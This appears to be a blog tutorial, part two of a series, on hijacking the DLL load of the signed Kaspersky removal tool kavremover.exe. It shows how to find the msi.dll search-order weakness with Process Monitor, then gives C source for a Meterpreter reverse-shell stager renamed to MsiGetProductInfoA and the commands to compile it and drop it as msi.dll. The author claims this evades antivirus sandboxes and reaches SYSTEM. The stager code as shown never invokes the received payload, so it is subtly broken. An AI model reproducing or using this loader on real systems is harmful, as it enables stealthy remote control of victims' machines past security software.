Customising Meterpreter Loader DLL part. 2

Today I will show you an interesting example how to search for vulnerable Dll functions that we can compile into our custom Meterpreter DLL loader and let a signed executable execute it.

I have taken the good old Kaspersky Removal tool called kavremover. This tool is perfect for this example. As a host system I have Windows 7 SP1 64bit. What we will need is the SysinternalsSuite toolkit, most importantly the Process Monitor (procmon.exe). So we start procmon.exe and create a filter rule for process name called kavremover.exe so we can select only this process for analysis. Next we load kavremover.exe and search for vulnerable DLL paths. After a while I came across the following DLL that gets searched first in the execution path i.e in the root folder where the kavremover.exe is executed. (In our case it is the users desktop)

kav-dll-msiSo we then search all the dlls for some interesting function that gets loaded from msi.dll and I have found an interesting list here:

kav-dll-01There are two functions in msi.dll called GetInfo and MsiGetProductInfoA. So lets try and modify our meterpreter dll file a little and change the main() function to either GetInfo or MsiGetProductInfoA.

The generator from my previous post generates a binary and c source file called temp.c. After setting the Metasploit server IP and port number, open the temp.c and modify the function main() to something like this:

int MsiGetProductInfoA(int argc, char * argv[]) {
    ULONG32 size;
    char * buffer;
    void (*function)();
    SOCKET my_socket = wsconnect(server, atoi(serverp));
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size <= 0)
        punt(my_socket, "error lenght\n");
    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "error in buf\n");
    buffer[0] = 0xBF;
    memcpy(buffer + 1, &my_socket, 4);
    count = recv_all(my_socket, buffer + 5, size);
    function = (void (*)())buffer;
    return 0;

Please note that if you use int GetInfo() the kavremover.exe will crash and we wont get a reverse shell, so use  MsiGetProductInfoA, this works just fine although the whole program wont load properly of course, but it gets the job done. Once modified, compile the temp.c


i586-mingw32msvc-gcc  temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
mv payload.dll msi.dll

Next we can upload the final msi.dll to the virtual testing system where the kavremover.exe is waiting. Start your favorite reverse shell payload via Metasploit and wait for the shell to pop up once we execute kavremover.exe

kavremover.exe is digitally signed so in many cases our dll will get loaded just fine, thus bypassing many sandbox techniques (like Comodo AV ) and allowing us to elevate to NT AUTHORITY/SYSTEM


Here is a short video of the whole process

Also here is a short video demonstrating the attack against fully updated Windows 8.1 64bit with active Windows Defender (kinda lame but nevertheless)…

And now to think what could possibly go wrong ….. (Win 8.1 64bit + Comodo AV Advanced 6)

Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s